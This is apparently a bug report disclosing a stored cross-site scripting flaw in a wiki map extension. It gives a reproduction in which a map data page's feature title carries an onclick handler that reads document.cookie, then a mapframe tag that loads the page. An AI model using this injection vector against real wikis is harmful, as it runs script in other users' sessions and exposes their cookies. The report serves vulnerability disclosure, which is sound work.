Discovered while investigating {T155216}. Minimal repro:
On shared wiki, create a page called `Data:XSS.map`:
```lang=javascript
{
"license": "CC0-1.0",
"description": {
"en": "blah"
},
"sources": "blah",
"zoom": 13,
"latitude": -34.75315,
"longitude": 149.71575,
"data": {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"properties": {
"title": {
"en": "<span onclick='javascript:alert(document.cookie)'>Click me</span>"
}
},
"geometry": {
"type": "Point",
"coordinates": [
149.713056,
-34.7475
]
}
}
]
}
}
```
Then, either on the same or client wiki, create the following page:
```
<mapframe width=500 height=500>
{
"type": "ExternalData",
"service": "page",
"title": "Test.map"
}
</mapframe>
```
Upon saving and clicking on affected marker, then on "click me", XSS is triggered. XSS is triggeredDoesn't seem to work with crude `<script>` injection.